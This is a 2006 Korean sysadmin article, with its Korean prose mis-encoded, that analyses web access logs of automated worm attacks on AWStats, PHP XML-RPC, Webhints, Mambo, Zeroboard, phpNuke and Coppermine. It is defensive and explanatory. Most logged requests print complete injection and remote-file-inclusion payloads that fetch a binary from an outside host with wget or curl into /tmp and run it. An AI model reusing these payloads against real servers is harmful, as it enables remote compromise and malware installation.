Ä¿ÇÇÇâÀÌ ³ª´Â *NIX
Ä¿ÇǴнº
½Ã½ºÅÛ/³×Æ®¿÷/º¸¾ÈÀ» ´Ù·ç´Â °÷
*
HanIRCÀÇ #coffeenix ¹æ
[
Àåºñ ¹× ȸ¼± ÈÄ¿ø
]
> Forum <
IT ÀÏÁ¤
N
e
w
!
ÀÚµ¿È ÇÁ·ÎÁ§Æ®
HOME
>
³×Æ®¿öÅ©(network)
>
À¥ ¼¹ö(web, httpd, apache)
µµ¿ò¸»
°Ë»ö :
»çÀÌÆ®
WHOIS
À¥¼¹ö Á¾·ù
WebDAV
(7, ±Û 1, ÀÚ·á 4)
À¥¼¹ö Æ©´×
(5, ±Û 4, ÀÚ·á 2)
À¥¼¹ö »ç¿ë Åë°è ÀÚ·á
(2, ÀÚ·á 1)
Apache SSL / mod_ssl
(4, ±Û 3, ÀÚ·á 2)
À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±× ºÐ¼® (3.22 Ãß°¡)
ÀÛ¼ºÀÏ : 2006/03/15 23:43
±Û¾´ÀÌ : ÁÁÀºÁøÈ£ (
http://coffeenix.net/
)
Á¶È¸¼ö : 95340
[
ÀÌÀüȸé
/
¼öÁ¤
] ºñ¹Ð¹øÈ£ :
Á¦ ¸ñ : À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±× ºÐ¼®
ÀÛ¼ºÀÚ : ÁÁÀºÁøÈ£(truefeel,
http://coffeenix.net/
)
ÀÛ¼ºÀÏ : 2006.1.20(±Ý)~
Á¤¸®ÀÏ : 2006.3.14(È)
¼öÁ¤ÀÏ : 2006.3.22(¼ö)
2004³â ¸»¿¡¼ 2005³â ÃÊ¿¡ Zeroboard, Å×Å©³ëÆ®, phpBB µîÀÇ Ãë¾àÁ¡°ú php¼³Á¤ ¹®Á¦·Î À¥»çÀÌÆ® º¯Á¶°¡
±ÞÁõÇß´ø ÀÏÀ» ±â¾ïÇÒ °ÍÀÌ´Ù. ÀÌ·¯ÇÑ °ø°ÝÀº ¿úÀ̳ª ÀÚµ¿ÈµÈ ÅøÀ» »ç¿ëÇؼ ÀÌ·ïÁö´Â°Ô ´ëºÎºÐÀ̸ç,
ºÐ¼®ÇÑ ·Î±× ¶ÇÇÑ ÀÚµ¿ÈµÈ °ø°Ý Åø¿¡ ÀÇÇØ ³²Àº °ÍÀÌ´Ù.
ºÐ¼®(?)ÇÑ À¥·Î±×´Â À¥·Î±× ºÐ¼®Åø AWStats Åø, ±×¸®°í WordPress, TikiWiki, Drupal, PHPGroupWare,
Webhints, Zeroboard, CMSÅø Mambo, Æ®·¡ÇÈ ºÐ¼®Åø Cacti µîÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý¿¡ ´ëÇÑ °Í µéÀÌ´Ù.
ÀÌ À¥·Î±×´Â ÁÖ¿ö ¸ðÀº°Ô ¾Æ´Ñ ¼¹ö¿¡ ³²Àº ·Î±×¸¦ ºÐ¸®Çؼ ¿Ã¸° °ÍÀÌ´Ù. ÀϺΠIP´Â xxx.xxx·Î Ç¥½ÃÇß´Ù.
¼¹ö¸¦ óÀ½ ¿î¿µÇϽô ºÐÀÌ ÀÌ ±ÛÀ» Àаí, 'Çä!! ¿ì¸® ¼¹öµµ °ø°Ý´çÇß³×, Å«ÀÏÀÌ´Ù.'¶ó°í ´çȲÇÒ±îºÁ
¹Ì¸® ¸»¾¸µå¸°´Ù. À§ÀÇ °ø°³ ÇÁ·Î±×·¥À» ¿î¿µÇÏÁö ¾ÊÀ¸¸é °ÆÁ¤ÇÒ ÇÊ¿ä°¡ ¾øÀ¸¸ç, ¿î¿µÇÏ´õ¶óµµ º¸¾ÈÆÐÄ¡°¡
ÀÌ·ïÁø ÃֽŹöÀü À̶ó¸é ±¦Âú´Ù.(°ø°³¾ÈµÈ Ãë¾àÁ¡µµ ÀÖÁö¸¸). ¶ÇÇÑ ·Î±×¿¡ HTTP/1.? 404 ¶ó°í º¸À̸é
°ø°Ý ½ÃµµÇÑ °ÍÀÏ»Ó ÇØÅ·´çÇÑ°Ô ¾Æ´Ï´Ï ¾È½ÉÇصµ ÁÁ´Ù.
¡Ø ÀÌ ±Û ¸¸ÅÀº MSIE¿¡¼ Å×À̺íÀÌ °¡Àå Àß Ç¥½ÃµË´Ï´Ù.
1. À¥·Î±× ºÐ¼®Åø AWStatsÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
203.194.xxx.xx - - [17/Jan/2006:02:09:04 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:05 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:06 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1" 404 0
- IP : È«Äá (HK, 203.194.128.0 - 203.194.255.255)
Âü°í ÀÚ·á :
* AWStats "configdir" Parameter Arbitrary Command Execution
http://secunia.com/advisories/13893
* AWStats Remote Command Execution Vulnerability
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185
2. PHP¿ë XML-RPCÀÇ Remote Code Injection Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
203.194.xxx.xx - - [17/Jan/2006:02:09:09 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:10 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:11 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:12 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:13 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:14 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:15 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:16 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:17 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:18 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 0
- IP : È«Äá (HK, 203.194.128.0 - 203.194.255.255)
- PHP¿ë XML-RPC 1.1 ÀÌÀü¿¡ ÀÖ´Â Ãë¾àÁ¡À¸·Î
WordPress, TikiWiki, Drupal, PHPGroupWare µîÀÇ ÇÁ·Î±×·¥µéµµ °ü·Ã Ãë¾àÁ¡ÀÌ ÀÖ´Ù.
- Linux/Lupper ¿úÀº XML-RPC Ãë¾àÁ¡, AWStats Ãë¾àÁ¡, Darryl Burgdorf Webhints Ãë¾àÁ¡À» ÀÌ¿ëÇÑ ¿úÀÌ´Ù.
Lupii ¿úÀ¸·Îµµ ºÒ¸°´Ù.
- ÀÌ ¿ú(º¯Á¾ Æ÷ÇÔ)Àº À§¿Í °°ÀÌ ÀÚµ¿À¸·Î À¥Æ÷Æ®¿¡ ¾ÇÀÇÀûÀÎ ¿äûÀ» Çϸç, ¸¸¾à Ãë¾àÁ¡ÀÌ ÀÖ´Â
½ºÅ©¸³Æ®°¡ ¼³Ä¡µÈ ¼¹ö¶ó¸é ¿ø°ÝÁöÀÇ ÆÄÀÏÀ» ´Ù¿î·Îµå ¹Þ¾Æ ½ÇÇàÇÑ´Ù.
Âü°í ÀÚ·á :
* XML-RPC for PHP Nested XML Tags PHP Code Execution
http://secunia.com/advisories/16431/
* PEAR XML_RPC Nested XML Tags PHP Code Execution
http://secunia.com/advisories/16429/
* Linux/Lupper.worm
http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html
http://vil.nai.com/vil/content/v_136821.htm
3. XML-RPC Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý 2
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
- IP : ±¹³»(CATV »ç¿ëÀÚ, 218.232.96.128-218.232.96.255)
4. Darryl Burgdorf Webhints Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
219.239.xxx.xx - - [20/Dec/2005:04:17:10 +0900] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:11 +0900] "GET /scgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:12 +0900] "GET /includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:14 +0900] "GET /cgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:15 +0900] "GET /scgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:16 +0900] "GET /cgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:17 +0900] "GET /scgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:18 +0900] "GET /cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:19 +0900] "GET /scgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:20 +0900] "GET /cgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:21 +0900] "GET /scgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:22 +0900] "GET /hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:23 +0900] "GET /cgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:25 +0900] "GET /scgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:26 +0900] "GET /cgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:27 +0900] "GET /scgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:28 +0900] "GET /hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:29 +0900] "GET /cgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:30 +0900] "GET /scgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:31 +0900] "GET /webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:32 +0900] "GET /cgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:33 +0900] "GET /scgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:35 +0900] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:36 +0900] "GET /cgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:37 +0900] "GET /scgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:38 +0900] "GET /cgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:39 +0900] "GET /scgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:40 +0900] "GET /hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:41 +0900] "GET /cgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:42 +0900] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:43 +0900] "GET /webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:45 +0900] "GET /cgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
219.239.xxx.xx - - [20/Dec/2005:04:17:46 +0900] "GET /scgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
5. CMS ÅøÀÎ Mambo Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
213.203.xxx.xx - - [10/Jan/2006:17:59:50 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:17:59:54 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:17:59:57 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:17:59:58 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:18:00:00 +0900] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
213.203.xxx.xx - - [10/Jan/2006:18:00:02 +0900] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 400 299
- IP : ÀÌÅ»¸®¾Æ (IT, 213.203.161.0 - 213.203.161.255)
6. ZeroboardÀÇ zero_vote Å׸¶ÀÇ Ãë¾àÀúÀ» ÀÌ¿ëÇÑ °ø°Ý
211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /board/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:34 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:48 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
211.42.90.126 - - [02/Dec/2005:09:53:49 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
- IP : ±¹³»(¼¿ï°íÀºÃʵîÇб³, 211.42.90.0-211.42.90.127)
Âü°í ÀÚ·á :
* Á¦·Îº¸µå º¸¾È Ãë¾àÁ¡ (ÇѱÛ)
http://bbs.kldp.org/viewtopic.php?p=218132
* STG Security Advisory: [SSA-20050113-25] ZeroBoard multiple vulnerabilities
http://www.securityfocus.com/archive/1/387076
* Zeroboard 'zero_vote' Include File Bug Lets Remote Users Execute Arbitray Commands
http://securitytracker.com/alerts/2005/Jan/1012812.html
* Application Attack Analysis (PHP Application Mass Attack) (ÇѱÛ, 2005.1.8)
http://www.scieng.net/zero/data/pds/1105342062/Application_Attack_Analysis
(PHP).pdf
7. phpNuke Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
216.72.xxx.xxx - - [07/Jan/2006:09:44:59 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:44 +0900] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:46 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:47 +0900] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:49 +0900] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
- IP : ¹Ì±¹ (US, 216.72.0.0 - 216.72.255.255)
ÄÝ·Òºñ¾Æ (CO, 200.75.46.32/27)
8. phpNuke/postNukeÀÇ Coppermine Æ÷Åä°¶·¯¸® ¸ðµâ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
200.75.xx.xx - - [06/Jan/2006:10:16:50 +0900] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
200.75.xx.xx - - [06/Jan/2006:10:16:52 +0900] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 0
- IP : ÄÝ·Òºñ¾Æ (CO, 200.75.46.32/27)
- THEME_DIR ÆĶó¹ÌÅÍÀÇ Ã¼Å©¸¦ ÇÏÁö ¾Ê¾Æ ³»¿ÜºÎ ÆÄÀÏÀÇ script code¸¦ includeÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ ÀÖ´Ù.
Âü°í ÀÚ·á :
* phpNuke/postNuke Coppermine Photo Gallery Module Multiple Vulnerabilities
http://secunia.com/advisories/11524/
9. Open WebMail Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý (Ãë¾àÁ¡ÀÌ ÀÖ´Â ¹öÀüÀÎÁö ÆľÇÇϱâ À§ÇÑ ¿äûÀ¸·Î ÆǴܵÊ)
203.190.xxx.xxx - - [01/Feb/2006:01:51:25 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.190.xxx.xxx - - [01/Feb/2006:01:52:32 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
- IP : ¹æ±Û¶óµ¥½Ã(BD, 203.190.254.0 - 203.190.255.255)
